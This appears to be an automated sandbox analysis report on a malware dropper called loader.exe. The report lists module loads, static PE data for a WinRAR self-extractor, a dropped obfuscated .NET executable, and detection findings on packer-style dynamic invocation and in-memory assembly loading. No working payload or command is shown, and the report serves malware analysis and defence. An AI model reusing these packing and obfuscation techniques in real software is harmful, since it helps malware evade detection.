        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: version.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: wldp.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: profapi.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: amsi.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: userenv.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: rasman.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: loader.exeStatic file information: File size 2040097 > 1048576
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: loader.exe
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        barindex
        .NET source code contains method to dynamically call methods (often used by packers)
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, e12nGA4j2K57ImO696x.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, e12nGA4j2K57ImO696x.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
        .NET source code contains potential unpacker
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs.Net Code: l7rP8nYagQ System.AppDomain.Load(byte[])
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs.Net Code: l7rP8nYagQ System.Reflection.Assembly.Load(byte[])
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs.Net Code: l7rP8nYagQ
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs.Net Code: l7rP8nYagQ System.AppDomain.Load(byte[])
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs.Net Code: l7rP8nYagQ System.Reflection.Assembly.Load(byte[])
        Source: 0.3.loader.exe.52cbfc4.1.raw.unpack, MUGdx8mv9tRbKvyDKpX.cs.Net Code: l7rP8nYagQ
        Source: C:\Users\user\Desktop\loader.exeFile created: C:\blockcomwinsavescrt\__tmp_rar_sfx_access_check_5466078Jump to behavior
        Source: loader.exeStatic PE information: section name: .didat
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0011E28C push eax; ret 0_2_0011E2AA
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0011CAC9 push eax; retf 0011h0_2_0011CACE
        Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0011ED46 push ecx; ret 0_2_0011ED59
        Source: C:\blockcomwinsavescrt\containercomponentSaves.exeCode function: 4_2_00007FFD9B9E96AD push es; retf 4_2_00007FFD9B9E96AE
        Source: containercomponentSaves.exe.0.drStatic PE information: section name: .text entropy: 7.220844092884831
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, bUytRpH2ket5ubfKtT6.csHigh entropy of concatenated method names: 'CQcTCBL1y1', 'DnqTB7fOwE', 'C35TJyy4et', 'O8XTYV5W4A', 'sUSTI2DC3a', 'v55TEkjRup', 'lV13xYVjUeCP4a4ImNg', 'eFbaCSVkqlkPEnVx4O5', 'x0pqBXVxFJySBEE5nUP', 'gKMB2VVrLw6f2UYjv6R'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, elCwswbtMBqseIwgfHR.csHigh entropy of concatenated method names: 'ffGm3l9ZuX', 'eB5maZyUVf', 'CPqU5k8HEBFSQ0GjXBI', 'zlAYDG8wlXATVs23tny', 'eP788o886q53k0JD89n', 'xgWgbS87TdJW7BekDTw', 'pFs1jJ8nEi8SJDGChIj', 'GCVDt08isApOBciG50I', 'DYKc8U8AvTenpJocy9r', 'MU89L48WMCqZOZl29aR'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, n6UdyhOPV5QHSu7lkW.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'F4FWkFXIK', 'klKAfuO4NIpQi0X4UQf', 'bvejhrOuKPmQXcknlMS', 'gaJhYmOmE6cG2JH39Kg', 'p0G1hnOJaOOoStxOUBg', 'FD3k7MONoYT7Pdtp4cm'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, iFLhSTby7W9nScAu0hw.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'OOa2i0Fvnl6ta26HedU', 'MCmTnHFVEbJNoVhaHy5', 'NcII8kF3VZWR5kQ0FXF', 'u5KaaBFSKJpCUvccooh', 'iiHEfOFgea5ef1H6TfT', 'BAYw2uFDlNOn7jjLUUS'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, BorSuEmfMjxPc3CDwgG.csHigh entropy of concatenated method names: 'Hou4XrHxOQ', 'UTjtSNaPBlsYnRy7mm8', 'bg5mGUajPI8UsQQhX51', 'i1fDRGarCvESdhW7AdP', 'sU444ZabPO8FiZqUni1', 'jboGy8apdoIWdsIeUC4', 'vam4FXj7YH', 'gcR4ipTVoi', 'vop451XbYo', 'gDg4dBjy46'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, JFNb1eHJOBjchb1Rkbk.csHigh entropy of concatenated method names: 'CdGXqjqpog', 'HsXXHiXt3a', 'lyaXUeOEvH', 'eMvX45vF7F', 'nOdXN0QgXU', 'SkXXvOpq5U', 'J0HXQqkPXt', 'uyCX3NZjdV', 'SJbXaaV3wE', 'XiqXeSKZRX'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, jVI6cGPt3PqUquW7AGA.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'JUWmpvhcOj', 'hgdQqsug71', 'AsVmsTFAAD', 'bahCK9LnGEeouLDjjvY', 'CBAArPLiSQlQALY1XD6', 'ye6XloLASltsmPBVF9D', 'r0NfAeLWXpdLegu9ViI', 'dhwT0rLE0djIJ2utuMj'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, ECP0llPltu3lsBBZy5w.csHigh entropy of concatenated method names: '_5u9', 'kjxmKouuUu', 'Mx9Q62wKSD', 'JgWm1mlKBK', 'fmK7daN9TmVdGi3CEhR', 'lmoZRpNcokpactjJBtQ', 'Lfwa86N6nQIRoT37cVP', 'hdMAinNyEdEZEaUrjmK', 'hmYHxYNMLaYRiPiCvMa', 'SjhpFrNzfAygFNtC7Qc'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, tp4UaRgMmABNs48VZv.csHigh entropy of concatenated method names: 'MberJrpob', 't4aRaFXrk', 'rXox6u6s8', 'elJ89dZ3T4mXZT5iE57', 'al2J9XZvD5lrZqMvXlj', 'SIRDCkZVsnLR9C76eoj', 'wSvFcHZSxVDNW85xPVF', 'SPoDXZZgs5PBSjClq4b', 'XysuYeZDBlQx4Il5cEI', 'UCQ1mqZGxyAxprB7rmB'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, nHqrNBzYBmF9MmlblR.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'EFIqJbshs0u0paqfhZT', 'l07h1ms1M63KmQI5Mq4', 'agPFbrsqu5lUdj0nAEu', 'boP3sLss8WSuDL7vYCX', 'zK7PHis2vpcM7Sk2gba', 'y9eNKdsK3jsCAF5Fq6p'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, j7AUw5HPrJniQE1pSCA.csHigh entropy of concatenated method names: 'YbFn6toNgH2jS3SQlMO', 'idXOqZoLLEf7RBOxLWd', 'ARjTH9omQel6k1NMURM', 'wwPYKVoJaJHWLWvKQS7', 'uwj5TaQEwb', 'CBVqyToIP5WYOO9YhuE', 'tvUhjqo5DEIxJpC3DNB', 'PLxjPwoYC6boTDr2bQw', 'WDlqSuoRAIe4Z7brZYn', 'R9UJOUoT55IcK0XyyPi'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, MUGdx8mv9tRbKvyDKpX.csHigh entropy of concatenated method names: 'Lq0P2pdj86', 'DHsPKnGq6j', 'XhPPrWnTrR', 'OnmPRC4bXj', 'K1MPxm9qTA', 'UuhPSFJwIh', 'V6hPVJGs9u', 'joCPa7nY33jJv60H9EL', 'IjY5BenNEBY393b2ie1', 'pcaNGvnLv6BnpSYSAc5'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, CXh8AJBnSkcukmHWrg.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'r58G21qT9Y5ChJhmjun', 'dJebwQqQhgBwFgJNrQh', 'Fm1XrLqCUcFRSeMGj3V', 'VOUvaxqf6rdMQqgaFNd', 'riwTi6qtxJaMPDHNnMr', 'y4skYlqo2YD49xl422E'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, bFtTbMPBLI0wnGgYrcK.csHigh entropy of concatenated method names: '_269', '_5E7', 'SGImENanxd', 'Mz8', 'DYamxtrNN9', 'hClo6uLbDHDqTvbTOoC', 'TO50ecLpX96rXuTf6sx', 'LZm9GfLlJ69kwGx4DeZ', 'vWp653Ly0mXVHL0k5j2', 'XgPXC5LM0s0Pko4229O'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, FCH5FRK6EmZD6E8Flv.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'J2SDbpHsg', 'Efl2IHOesLix9E22MSR', 'FycZdVOvyLH3bDAGb5N', 'dDTkwwOVlcehISOwwN0', 'JbnoaoO3O3yihJ7gQr6', 'dBp35XOSVOSGa8Uc1pY'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, A1akYtUK8MJXkN4vhbx.csHigh entropy of concatenated method names: 'A6G4HTX1cvLgj0oorKk', 'kxd1DkXq4rJGNdB22sc', 'W5kOWCXOw0OM1s6M3Wb', 'BALFp3Xh083KlyLsQ16', 'Oa2GrgGF2P', 'WM4', '_499', 'cIHGRijSq8', 'yrDGxR6WdH', 'Vj7GSUG8mu'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, s9Y2BEHrqJpZOZSGI5A.csHigh entropy of concatenated method names: 'IKQX6LbDhx', 'HGVkXwV9ZC6GXHW0rBR', 'eymmZlVydknACBTaLyL', 'Ih8B6xVMBx9AuQDKAH8', 'LyL4HCVcorLVtrxdg1o', 'bnMCe5V6E1NK7Q0fDjj', 'tkbvp9VzR2I0OoHAj3P'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, wQHF4Mm5uukMOApHvpf.csHigh entropy of concatenated method names: 'n8nqjDXBNo', 'L53q8aCs2j', 'PhErJ6AYBYtSrOQDMcA', 'hNEDSTAR67xAQ3Wtvow', 'CK5P8ZANiKDom7b4Hip', 'NtvbC6ALvYdBSeyXKWX', 'XqoUQjAIWHXBJ2D8Y87', 'PSEqo8A51KoyRIRrbGG', 'tDLFnDAT4WdAsU2Tlcl', 'kVFuTtAQp8acb3oYOUU'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, wksgOpbrVGle9jeAxPs.csHigh entropy of concatenated method names: 'CkmbBHWrgn', 'HdZwGIwYD89y13wF403', 'hmxUWfwRFjNAoJrLnPH', 'Ly2GUQwNomOEtmnW5w1', 'NA5InHwLfFvGTBJegeC', 'XfMmjRwI3o3vxbVDurV', 'QLw', 'YZ8', 'cC5', 'G9C'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, HAS1N5qdr3wOgLTRXnT.csHigh entropy of concatenated method names: 'KeGeKqJM5O', 'SWUervKywi', 'rtQeRqrWsO', 'bcGex99aMe', 'h8qeSra5hY', 'XbpSl3Ieimgy8QI1o5o', 'z7FoFIIv2v2I5MnvGfu', 'jWBjETIoVPXMZ5CDDUQ', 'GFJTLmIdvetX28Vs2EC', 'lQaXMfIVbDGrGByRF2M'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, vRdEDlPn8vha27TubKF.csHigh entropy of concatenated method names: 'uYyNk1ElHH', 'uN0N1E3FsZ', 'LN0N01TPmw', 'YJ1WN5mkawBOc2yQBUB', 'DlTXfwmxvncR6pFYmce', 'ccqOY7mjscgnJ9Qonj2', 'gSjfXDmrHuc65XBhCUX', 'g8h5DYmPlxOERCCgn4w', 'mJLonSmbIO50JdB29QT', 'LGsJtPmp8bHItZDYKgY'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, C1Kwxyb8rOWXASFsFSh.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'UcTCbL2SOMuT5lkDLLk', 'j96NhG2g2rgnxI2VWli', 'Fn2TUg2DvVPNApCLtkO', 'dTjxH22GC0PtfgskaJF', 'bCdHov2XY1tK54dO6YI', 'N5dItd2BRh87elW23Cy'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, e12nGA4j2K57ImO696x.csHigh entropy of concatenated method names: 'ei38a7kIhTl8vQgIvFS', 'SHyg6yk5QwjfX7y1OGf', 'DY1nhrkYlH9wWZOWZYI', 'krf55LkRn16eth5L5EE', 'DsOO8emQO3', 'RRvlRdkC72BUgMMlxJk', 'fCmVfokfHPPuZfyYOEo', 'Jy541CktndFMhLabHhy', 'uMRpVBkoL8ZM5ZCHSIw', 'joWygvkdrT2D3qhTnhn'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, QCfeZLboatOyyPr17xS.csHigh entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'N8OBfdKeUvyDYFK5orx', 'bZAX7ZKv0cKrUnoi9bd', 'SR1wm9KVxGlb76JEP4a', 'FnvOyfK3wwcCNBejHjw', 'yVPbXaKSsB8gFxVxKiZ', 'DBDsh8KgHPbIgIorqkL'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, xbBULjmFkULeYUmGUcZ.csHigh entropy of concatenated method names: 'EgIPzNM8Kh', 'mPYq6wLB0t', 'SNJqbvWmfr', 'SSoqmIJMAP', 'bJ1qP6rTXU', 'raEqqnYGQ9', 'DPrqHe24xa', 'vmRqU62inj', 'Qn5q4DFqgH', 'vJqqNlFwIS'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, vwlNuPb3edRno2vaWGw.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'BFCsiP24pF43i11lJeq', 'lSDRHH2uhctE7Y5ytWv', 'YfUxCZ2mfpBmdlfWxh3', 'uhj1Ub2JNMR1q7WHNTm', 'dARfuU2N9gdrrukEmPS', 'EOyb6p2LALv5rZVS1kH'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, xG0CAmbGlBQK1fwnGKN.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'KVwHDKK6Cnqc1fA6xwE', 'jtWif0KzedbaWDqkPXS', 'ecED9GF0sT8WwtR8uHy', 'JSUQLZFZI6vmBGra5fE', 'ogF4eiFOpGQOiKBSAWG', 'V6XEx3Fh0IiZQaKtU8k'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, AgoF7EbnOr49pcPxwU9.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'Fufo532pg4RvFkfNXFk', 'f7Lxud2lpO9eCnk6yDH', 'Rj9dyN2y2kq1CujxpLj', 'peQVcR2MKDN3q8TcdnX', 'njYH2729P0sPUCidywV', 'YhE1DR2cT1ifc6C9By2'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, jd0HwDlT8GxPKeMdEi.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'XyPqE21Uu6BeEfVO7bH', 'yHgHpH1ac6xvqlAkZj9', 'SX2yLh14kI4bigcACF8', 'QDNyxZ1us3HCmhBVC13', 'ogYnkO1mct5gqIsnker', 'rxJ1QX1J8KZ8n4kVXU9'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, JTO8SctOJmFB3go1oa.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'urE3y21XdCqigMc35V9', 'CPGiSk1Bk5gxZFwhZRI', 'wk8BRm1k8qwJGEoEpW7', 'cVvxKC1xZcCVm4RuDDA', 'jrq7yN1jWYtOWn0ZOBP', 'xOlJBG1rQIZqZ9WJst5'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, Yt3a7Am8VijrPK9kO2G.csHigh entropy of concatenated method names: 'sBwPYWXI6r', 'xQ6dyGihFmCxCJQqmK6', 'uAxQvyi1ofcSFH2NtqY', 'R2a3KEiZwFl9IinAsSM', 'v0gG0riOqaUlZ9TwGkU', 'qRLOahiqsUBgZB135Uf', 'aXhvY9is7POkobNXaxu', 'Oqre2Li2LAB5DEqe7Zu', 'g0IWibiKKabeLPH8axT', 'G0tftbiFeM9CcS0a7Kn'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, wJ1dfEmp41vNSXt0yg3.csHigh entropy of concatenated method names: 'Ospqddj6sY', 'euXqs7vOQT', 'fVHqpoU3Vh', 'fdjqodby4Q', 'R9FqTVxoTl', 'FVTdCeW0jTYVTXOIi8H', 'Fdp9dgWZ1TLMVxBZPu3', 'brPtArA68m4hqTMxg7g', 'agrZrkAzhngwOPPrst1', 'utiUcXWOatEZxsVZRwO'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, kvrRbIbHsfU9Oh5es90.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'kd2mhyskk8u4g8jderU', 'z5M5yasxM3djcbHPvi5', 'FSb3S6sjyuC79AifabV', 'EwhnxssrklsCosB83II', 'QoMOhTsPhZvGjoOYYXu', 'WEcuqgsbm7xMoFiO6Oa'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, FaxwEWbPU72abilU8M4.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'zlsBVXsCGvOaU056nSq', 'djj90jsfB0d6lhL1D5I', 'lhvNndstwMoQcBcRRoT', 'CW94OTsocMVxIA6ofKQ', 'wGmnVHsdZWAm3D5ntwu', 'gEpyhYse8lZPDSMnu7o'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, jLiTgrbvGArAJy852Vc.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'hMHrQq22VtiCNLMvxj8', 'ktOLwd2KHJ45drmeAPU', 'bKkZkV2FB1d9nyhuQgT', 'i2ZBMG2wkBFfhOPdOvq', 'BJ2iwH28dfTh84U5nVD', 'khRtMu2H7A6GGyYMrfK'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, PNaRg0PwwOu3q138Sha.csHigh entropy of concatenated method names: 'sg9', 'grcmlPHBiN', 'r6gvE9iljP', 'begm9GIhEg', 'okYqpfNjwXRpxMwX8ZC', 'jTD4rDNrokxx5HXGT1H', 'LcOa2ENPeyPu6oS1PNU', 'z1lMNtNk5CS1cuc9EOi', 'ChMqFANxDOMAV6BMNph', 'vphEa0NbZP9grSaqsMf'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, ceqVeGqY0y8eo7AOStU.csHigh entropy of concatenated method names: 'MWwcXHXN01', 'xOtcGADH7C', 'STjcj4Frpw', 'iWbc8UCM3c', 'PCnccTB4im', 'R89cndeH0O', 'b2kc9BsP5M', 'Vx8cLeTEiN', 'hyIcF31ZJZ', 'JKdci9a7Ma'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, lU8KOybsYAd686pdQsr.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'iSvNJIKY5QEdUVF23ev', 'WD0xKGKRmdevsTZuvq8', 'T02gTCKI6RkcLvhIaqP', 'DFJ46XK5RWj1JpHgL84', 'y0UvNjKTB7AHqHYice1', 'i6VmHTKQoVGwQby1X1q'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, I5MRP2pJ3TrvxJeUC7.csHigh entropy of concatenated method names: 'aPlTlj0re', 'VOwXq3eFh', 'P28gx1Ll8', 'xUVGqFO7A', 'T4M70248s', 'L7Fydu2EP', 'Rgthe84DA', 'ujNynUZKSJAHeuFxvTw', 'Fh0mekZFPteHCRLd6yf', 'CHyGsSZwBDfgIJ3cJTQ'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, XRvakYPisYbwnI0BclJ.csHigh entropy of concatenated method names: 'Ei6vcYaTxA', 'I1Nvn5r3wO', 'yLTv9RXnTL', 'dLOCf6JX0j9iuJG4MJ6', 'iv9BeKJDrOI4yCJRHbR', 'xWYujsJGeApA4CNxth4', 'AbJtZhJBOQJ7kFh8XHE', 'X2YvUQcOKj', 'j9rv4qcwn9', 'p0ZvNdSIrB'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, AgDAtpbSSmFmyiXsvFE.csHigh entropy of concatenated method names: 'z7VbEDC8V6', 'vmffNLwVQOloP4XuqoY', 'F8oF90w3RScTX9qNesT', 'DHgT3rweGjpKiKrCOYX', 'cnZoIbwvVoNONNuNDrH', 'Bg5pSgwSIY179Tq3m1J', '_3Xh', 'YZ8', '_123', 'G9C'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, vFBsjGPYXxna6swQVGV.csHigh entropy of concatenated method names: 'SJekxUYVbPoxpAIA8qg', 'BmjhBXY3cuq067d0baH', 'a6GnTdYewFgrjHvFKTK', 'hW1iOXYvkyE50FpcdX6', 'IWF', 'j72', 'D7uQ9nHouf', 'cIAQL8NK7q', 'j4z', 'hTuQF5o7ww'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, hpip68PkIL0HBLcli0C.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'H4ZmfD2rxZ', '_168', 'kOmpR9LRmqji6LA8WjV', 'NJxynRLIcLb58Qf1UKb', 'Fm09xRL5XqxiBQTtWHY', 'igpGwZLTljJTxdb35Fv', 'QYGWwgLQCvlCgmDDMkd'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, sPtCV7myVk2T1Yrrjij.csHigh entropy of concatenated method names: 'M5NqE1OZS9', 'OIZqf61mq1', 'jTQqzHF4Mu', 'DkMH6OApHv', 'vfrHbc2pm0', 'xLRHm8sxMU', 'SDmHPkRsKp', 'AVpHqIbH4M', 'OtVHHaoJ1d', 'biTURSWyReGwKooKwJH'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, KwhRhAm9jP5F8UtPpkd.csHigh entropy of concatenated method names: 'SdXPE1XvGn', 'Qx8PfRkHlx', 'LnFsRZi4oSBItx4aMtt', 'uhYxx0iu2CW1jgP8qvw', 'x77uRJimdFZbeXAH97W', 'rBFZciiJLovgGehpSJu', 'Ln1h42iN1ptjuHLfWBA', 'EBcwLGiL5d4NyUOa8Mo', 's8CyoaiY7xSo35JW0Cp', 'r8b2EhiRFaNkf8dIPDV'
        Source: 0.3.loader.exe.6988fc4.0.raw.unpack, rKNBkDbXbIyyge3NUG5.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'CZQlJ9KxHooP3Gs7OQ7', 'Ipy2mTKj3wcR6sLHneE', 'Fa2ycaKrv6RDHqkaOfo', 'EynjTyKPGQxDYRtJaYe', 'naTVGpKbhy2M0aeYmOZ', 'Cky1bpKpKDXj98DHFQL'
